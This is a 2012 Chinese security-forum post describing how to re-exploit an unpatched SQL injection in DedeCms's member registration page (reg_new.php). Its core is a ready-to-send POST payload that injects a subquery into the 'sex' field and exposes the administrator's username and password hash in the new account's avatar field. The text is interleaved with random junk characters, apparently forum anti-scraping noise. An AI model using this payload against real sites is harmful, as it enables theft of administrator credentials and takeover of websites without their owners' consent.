找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122% b  s2 i* I1 ^2 d2 Y! \

$ A& Z/ ~7 |" J5 w& ]; e* T$ k! n需要magic_quotes_gpc=Off' N! C$ A/ ^: i* C4 L3 L1 A$ Y5 t7 D
  I' ]' _. l4 F- n
应该是没有什么大危害的漏洞.& S1 C8 v( Y: Y/ ~/ S" Q' u
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 A, z3 i* P# v* A  J

& m2 b) g- C3 ]- V+ V% c; d是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.. s" n& Z2 u; q2 _( c  @$ W5 G- C
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
1 _$ y5 ^4 p' b0 ^% T0 G  Q5 R8 g& h
http:///de/member/reg_new.php  I# Z7 u% r  S" ~9 |* ~$ i! H2 K

2 W# S1 c' n! f0 v8 M' O$ b9 [2 ?POST; @+ X; v* e% m. D" J

4 C: u# C" N0 P! p# Ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
( B- |5 B0 H8 F1 w+ Z* x0 X, U( s4 ?/ `1 p4 B5 v' X+ Z3 G
成功注册后,头像处里面有好玩的信息.+ T* u2 h# l1 S- \5 T0 L

' A0 R& ~# r: ^; g; M* Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表